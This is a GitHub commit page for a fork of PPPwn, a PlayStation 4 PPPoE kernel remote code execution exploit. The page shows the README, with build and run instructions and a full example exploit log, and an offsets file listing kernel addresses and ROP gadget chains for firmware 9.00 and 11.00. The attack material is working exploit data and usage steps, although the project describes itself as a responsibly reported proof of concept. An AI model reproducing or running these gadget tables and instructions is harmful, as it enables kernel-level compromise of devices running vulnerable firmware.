forked from TheOfficialFloW/PPPwn
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
0 parents
commit 8010056
Showing
18 changed files
with
1,810 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,4 @@ | ||
| __pycache__/ | ||
| *.o | ||
| *.elf | ||
| *.bin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,3 @@ | ||
| [submodule "freebsd-headers"] | ||
| path = freebsd-headers | ||
| url = https://github.com/OpenOrbis/freebsd-headers |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,21 @@ | ||
| The MIT License (MIT) | ||
|
|
||
| Copyright (C) 2024 Andy Nguyen | ||
|
|
||
| Permission is hereby granted, free of charge, to any person obtaining a copy | ||
| of this software and associated documentation files (the "Software"), to deal | ||
| in the Software without restriction, including without limitation the rights | ||
| to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | ||
| copies of the Software, and to permit persons to whom the Software is | ||
| furnished to do so, subject to the following conditions: | ||
|
|
||
| The above copyright notice and this permission notice shall be included in all | ||
| copies or substantial portions of the Software. | ||
|
|
||
| THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR | ||
| IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, | ||
| FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE | ||
| AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER | ||
| LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, | ||
| OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE | ||
| SOFTWARE. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,147 @@ | ||
| # PPPwn - PlayStation 4 PPPoE RCE | ||
| PPPwn is a kernel remote code execution exploit for PlayStation 4 upto FW 11.00. This is a proof-of-concept exploit for [CVE-2006-4304](https://hackerone.com/reports/2177925) that was reported responsibly to PlayStation. | ||
|
|
||
| Supported versions are: | ||
| - FW 9.00 | ||
| - FW 11.00 | ||
| - more can be added (PRs are welcome) | ||
|
|
||
| The exploit only prints `PPPwned` on your PS4 as a proof-of-concept. In order to launch Mira or similar homebrew enablers, the `stage2.bin` payload needs to be adapted. | ||
|
|
||
| ## Requirements | ||
| - Computer with Ethernet port | ||
| - USB adapter also works | ||
| - Ethernet cable | ||
| - Linux | ||
| - You can use VirtualBox to create a Linux VM with `Bridged Adapter` as network adapter to use the ethernet port in the VM. | ||
| - Python3 and gcc installed | ||
|
|
||
| ## Usage | ||
|
|
||
| On your computer, clone the repository: | ||
|
|
||
| ```sh | ||
| git clone --recursive https://github.com/TheOfficialFloW/PPPwn | ||
| ``` | ||
|
|
||
| Install the requirements: | ||
|
|
||
| ```sh | ||
| sudo pip install -r requirements.txt | ||
| ``` | ||
|
|
||
| Compile the payloads: | ||
|
|
||
| ```sh | ||
| make -C stage1 FW=1100 clean && make -C stage1 FW=1100 | ||
| make -C stage2 FW=1100 clean && make -C stage2 FW=1100 | ||
| ``` | ||
|
|
||
| For other firmwares, e.g. FW 9.00, pass `FW=900`. | ||
|
|
||
| Run the exploit (see `ifconfig` for the correct interface): | ||
|
|
||
| ```sh | ||
| sudo python3 pppwn.py --interface=enp0s3 --fw=1100 | ||
| ``` | ||
|
|
||
| For other firmwares, e.g. FW 9.00, pass `--fw=900`. | ||
|
|
||
| On your PS4: | ||
|
|
||
| - Go to `Settings` and then `Network` | ||
| - Select `Set Up Internet connection` and choose `Use a LAN Cable` | ||
| - Choose `Custom` setup and choose `PPPoE` for `IP Address Settings` | ||
| - Enter anything for `PPPoE User ID` and `PPPoE Pasword` | ||
| - Choose `Automatic` for `DNS Settings` and `MTU Settings` | ||
| - Choose `Do Not Use` for `Proxy Server` | ||
| - Click `Test Internet Connection` to communicate with your computer | ||
|
|
||
| If the exploit fails or the PS4 crashes, you can skip the internet setup and simply click on `Test Internet Connection`. If the `pppwn.py` script is stuck waiting for a request/response, abort it and run it again on your computer, and then click on `Test Internet Connection` on your PS4. | ||
|
|
||
| If the exploit works, you should see an output similar to below, and you should see `Cannot connect to network.` followed by `PPPwned` printed on your PS4. | ||
|
|
||
| ### Example run | ||
|
|
||
| ```sh | ||
| [+] PPPwn - PlayStation 4 PPPoE RCE by theflow | ||
| [+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin | ||
|
|
||
| [+] STAGE 0: Initialization | ||
| [*] Waiting for PADI... | ||
| [+] pppoe_softc: 0xffffabd634beba00 | ||
| [+] Target MAC: xx:xx:xx:xx:xx:xx | ||
| [+] Source MAC: 07:ba:be:34:d6:ab | ||
| [+] AC cookie length: 0x4e0 | ||
| [*] Sending PADO... | ||
| [*] Waiting for PADR... | ||
| [*] Sending PADS... | ||
| [*] Waiting for LCP configure request... | ||
| [*] Sending LCP configure ACK... | ||
| [*] Sending LCP configure request... | ||
| [*] Waiting for LCP configure ACK... | ||
| [*] Waiting for IPCP configure request... | ||
| [*] Sending IPCP configure NAK... | ||
| [*] Waiting for IPCP configure request... | ||
| [*] Sending IPCP configure ACK... | ||
| [*] Sending IPCP configure request... | ||
| [*] Waiting for IPCP configure ACK... | ||
| [*] Waiting for interface to be ready... | ||
| [+] Target IPv6: fe80::2d9:d1ff:febc:83e4 | ||
| [+] Heap grooming...done | ||
|
|
||
| [+] STAGE 1: Memory corruption | ||
| [+] Pinning to CPU 0...done | ||
| [*] Sending malicious LCP configure request... | ||
| [*] Waiting for LCP configure request... | ||
| [*] Sending LCP configure ACK... | ||
| [*] Sending LCP configure request... | ||
| [*] Waiting for LCP configure ACK... | ||
| [*] Waiting for IPCP configure request... | ||
| [*] Sending IPCP configure NAK... | ||
| [*] Waiting for IPCP configure request... | ||
| [*] Sending IPCP configure ACK... | ||
| [*] Sending IPCP configure request... | ||
| [*] Waiting for IPCP configure ACK... | ||
| [+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141 | ||
|
|
||
| [+] STAGE 2: KASLR defeat | ||
| [*] Defeating KASLR... | ||
| [+] pppoe_softc_list: 0xffffffff884de578 | ||
| [+] kaslr_offset: 0x3ffc000 | ||
|
|
||
| [+] STAGE 3: Remote code execution | ||
| [*] Sending LCP terminate request... | ||
| [*] Waiting for PADI... | ||
| [+] pppoe_softc: 0xffffabd634beba00 | ||
| [+] Target MAC: xx:xx:xx:xx:xx:xx | ||
| [+] Source MAC: 97:df:ea:86:ff:ff | ||
| [+] AC cookie length: 0x511 | ||
| [*] Sending PADO... | ||
| [*] Waiting for PADR... | ||
| [*] Sending PADS... | ||
| [*] Triggering code execution... | ||
| [*] Waiting for stage1 to resume... | ||
| [*] Sending PADT... | ||
| [*] Waiting for PADI... | ||
| [+] pppoe_softc: 0xffffabd634be9200 | ||
| [+] Target MAC: xx:xx:xx:xx:xx:xx | ||
| [+] AC cookie length: 0x0 | ||
| [*] Sending PADO... | ||
| [*] Waiting for PADR... | ||
| [*] Sending PADS... | ||
| [*] Waiting for LCP configure request... | ||
| [*] Sending LCP configure ACK... | ||
| [*] Sending LCP configure request... | ||
| [*] Waiting for LCP configure ACK... | ||
| [*] Waiting for IPCP configure request... | ||
| [*] Sending IPCP configure NAK... | ||
| [*] Waiting for IPCP configure request... | ||
| [*] Sending IPCP configure ACK... | ||
| [*] Sending IPCP configure request... | ||
| [*] Waiting for IPCP configure ACK... | ||
|
|
||
| [+] STAGE 4: Arbitrary payload execution | ||
| [*] Sending stage2 payload... | ||
| [+] Done! | ||
| ``` |
Submodule freebsd-headers
added at
ad8cef
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,192 @@ | ||
| # Copyright (C) 2024 Andy Nguyen | ||
| # | ||
| # This software may be modified and distributed under the terms | ||
| # of the MIT license. See the LICENSE file for details. | ||
|
|
||
|
|
||
| # FW 9.00 | ||
| class OffsetsFirmware_900: | ||
| PPPOE_SOFTC_LIST = 0xffffffff843ed9f8 | ||
|
|
||
| KERNEL_MAP = 0xffffffff84468d48 | ||
|
|
||
| SETIDT = 0xffffffff82512c40 | ||
|
|
||
| KMEM_ALLOC = 0xffffffff8257be70 | ||
| KMEM_ALLOC_PATCH1 = 0xffffffff8257bf3c | ||
| KMEM_ALLOC_PATCH2 = 0xffffffff8257bf44 | ||
|
|
||
| MEMCPY = 0xffffffff824714b0 | ||
|
|
||
| MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb949 | ||
|
|
||
| SECOND_GADGET_OFF = 0x3d | ||
|
|
||
| # 0xffffffff82996603 : jmp qword ptr [rsi + 0x3d] | ||
| FIRST_GADGET = 0xffffffff82996603 | ||
|
|
||
| # 0xffffffff82c76646 : push rbp ; jmp qword ptr [rsi] | ||
| PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c76646 | ||
|
|
||
| # 0xffffffff822b4151 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] | ||
| POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822b4151 | ||
|
|
||
| # 0xffffffff82941e46 : lea rsp, [rsi + 0x20] ; repz ret | ||
| LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82941e46 | ||
|
|
||
| # 0xffffffff826c52aa : add rsp, 0x28 ; pop rbp ; ret | ||
| ADD_RSP_28_POP_RBP_RET = 0xffffffff826c52aa | ||
|
|
||
| # 0xffffffff8251b08f : add rsp, 0xb0 ; pop rbp ; ret | ||
| ADD_RSP_B0_POP_RBP_RET = 0xffffffff8251b08f | ||
|
|
||
| # 0xffffffff822008e0 : ret | ||
| RET = 0xffffffff822008e0 | ||
|
|
||
| # 0xffffffff822391a8 : pop rdi ; ret | ||
| POP_RDI_RET = 0xffffffff822391a8 | ||
|
|
||
| # 0xffffffff822aad39 : pop rsi ; ret | ||
| POP_RSI_RET = 0xffffffff822aad39 | ||
|
|
||
| # 0xffffffff82322eba : pop rdx ; ret | ||
| POP_RDX_RET = 0xffffffff82322eba | ||
|
|
||
| # 0xffffffff822445e7 : pop rcx ; ret | ||
| POP_RCX_RET = 0xffffffff822445e7 | ||
|
|
||
| # 0xffffffff822ab4dd : pop r8 ; pop rbp ; ret | ||
| POP_R8_POP_RBP_RET = 0xffffffff822ab4dd | ||
|
|
||
| # 0xffffffff8279fa0f : pop r12 ; ret | ||
| POP_R12_RET = 0xffffffff8279fa0f | ||
|
|
||
| # 0xffffffff82234ec8 : pop rax ; ret | ||
| POP_RAX_RET = 0xffffffff82234ec8 | ||
|
|
||
| # 0xffffffff822008df : pop rbp ; ret | ||
| POP_RBP_RET = 0xffffffff822008df | ||
|
|
||
| # 0xffffffff82bb687a : push rsp ; pop rsi ; ret | ||
| PUSH_RSP_POP_RSI_RET = 0xffffffff82bb687a | ||
|
|
||
| # 0xffffffff82244ed0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax | ||
| MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82244ed0 | ||
|
|
||
| # 0xffffffff82b7450e : mov byte ptr [rcx], al ; ret | ||
| MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b7450e | ||
|
|
||
| # 0xffffffff82632b9c : mov rdi, rbx ; call r12 | ||
| MOV_RDI_RBX_CALL_R12 = 0xffffffff82632b9c | ||
|
|
||
| # 0xffffffff8235b387 : mov rdi, r14 ; call r12 | ||
| MOV_RDI_R14_CALL_R12 = 0xffffffff8235b387 | ||
|
|
||
| # 0xffffffff822e3d7e : mov rsi, rbx ; call rax | ||
| MOV_RSI_RBX_CALL_RAX = 0xffffffff822e3d7e | ||
|
|
||
| # 0xffffffff82363918 : mov r14, rax ; call r8 | ||
| MOV_R14_RAX_CALL_R8 = 0xffffffff82363918 | ||
|
|
||
| # 0xffffffff82cb683a : add rdi, rcx ; ret | ||
| ADD_RDI_RCX_RET = 0xffffffff82cb683a | ||
|
|
||
| # 0xffffffff82409557 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret | ||
| SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82409557 | ||
|
|
||
| # 0xffffffff82b85693 : jmp r14 | ||
| JMP_R14 = 0xffffffff82b85693 | ||
|
|
||
|
|
||
| # FW 11.00 | ||
| class OffsetsFirmware_1100: | ||
| PPPOE_SOFTC_LIST = 0xffffffff844e2578 | ||
|
|
||
| KERNEL_MAP = 0xffffffff843ff130 | ||
|
|
||
| SETIDT = 0xffffffff8245bdb0 | ||
|
|
||
| KMEM_ALLOC = 0xffffffff82445e10 | ||
| KMEM_ALLOC_PATCH1 = 0xffffffff82445edc | ||
| KMEM_ALLOC_PATCH2 = 0xffffffff82445ee4 | ||
|
|
||
| MEMCPY = 0xffffffff824dddf0 | ||
|
|
||
| MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff824f1299 | ||
|
|
||
| SECOND_GADGET_OFF = 0x3e | ||
|
|
||
| # 0xffffffff82eb1f97 : jmp qword ptr [rsi + 0x3e] | ||
| FIRST_GADGET = 0xffffffff82eb1f97 | ||
|
|
||
| # 0xffffffff82c75166 : push rbp ; jmp qword ptr [rsi] | ||
| PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c75166 | ||
|
|
||
| # 0xffffffff824b90e1 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10] | ||
| POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff824b90e1 | ||
|
|
||
| # 0xffffffff8293c8c6 : lea rsp, [rsi + 0x20] ; repz ret | ||
| LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8293c8c6 | ||
|
|
||
| # 0xffffffff826cb2da : add rsp, 0x28 ; pop rbp ; ret | ||
| ADD_RSP_28_POP_RBP_RET = 0xffffffff826cb2da | ||
|
|
||
| # 0xffffffff824cdd5f : add rsp, 0xb0 ; pop rbp ; ret | ||
| ADD_RSP_B0_POP_RBP_RET = 0xffffffff824cdd5f | ||
|
|
||
| # 0xffffffff822007e4 : ret | ||
| RET = 0xffffffff822007e4 | ||
|
|
||
| # 0xffffffff825f38ed : pop rdi ; ret | ||
| POP_RDI_RET = 0xffffffff825f38ed | ||
|
|
||
| # 0xffffffff8224a6a9 : pop rsi ; ret | ||
| POP_RSI_RET = 0xffffffff8224a6a9 | ||
|
|
||
| # 0xffffffff822a4762 : pop rdx ; ret | ||
| POP_RDX_RET = 0xffffffff822a4762 | ||
|
|
||
| # 0xffffffff8221170a : pop rcx ; ret | ||
| POP_RCX_RET = 0xffffffff8221170a | ||
|
|
||
| # 0xffffffff8224ae4d : pop r8 ; pop rbp ; ret | ||
| POP_R8_POP_RBP_RET = 0xffffffff8224ae4d | ||
|
|
||
| # 0xffffffff8279faaf : pop r12 ; ret | ||
| POP_R12_RET = 0xffffffff8279faaf | ||
|
|
||
| # 0xffffffff8221172e : pop rax ; ret | ||
| POP_RAX_RET = 0xffffffff8221172e | ||
|
|
||
| # 0xffffffff822008df : pop rbp ; ret | ||
| POP_RBP_RET = 0xffffffff822008df | ||
|
|
||
| # 0xffffffff82bb5c7a : push rsp ; pop rsi ; ret | ||
| PUSH_RSP_POP_RSI_RET = 0xffffffff82bb5c7a | ||
|
|
||
| # 0xffffffff823ce260 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax | ||
| MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff823ce260 | ||
|
|
||
| # 0xffffffff8236ae58 : mov byte ptr [rcx], al ; ret | ||
| MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff8236ae58 | ||
|
|
||
| # 0xffffffff8233426c : mov rdi, rbx ; call r12 | ||
| MOV_RDI_RBX_CALL_R12 = 0xffffffff8233426c | ||
|
|
||
| # 0xffffffff823340a7 : mov rdi, r14 ; call r12 | ||
| MOV_RDI_R14_CALL_R12 = 0xffffffff823340a7 | ||
|
|
||
| # 0xffffffff82512dce : mov rsi, rbx ; call rax | ||
| MOV_RSI_RBX_CALL_RAX = 0xffffffff82512dce | ||
|
|
||
| # 0xffffffff82624df8 : mov r14, rax ; call r8 | ||
| MOV_R14_RAX_CALL_R8 = 0xffffffff82624df8 | ||
|
|
||
| # 0xffffffff82cb535a : add rdi, rcx ; ret | ||
| ADD_RDI_RCX_RET = 0xffffffff82cb535a | ||
|
|
||
| # 0xffffffff8260f297 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret | ||
| SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff8260f297 | ||
|
|
||
| # 0xffffffff82b84657 : jmp r14 | ||
| JMP_R14 = 0xffffffff82b84657 |
Oops, something went wrong.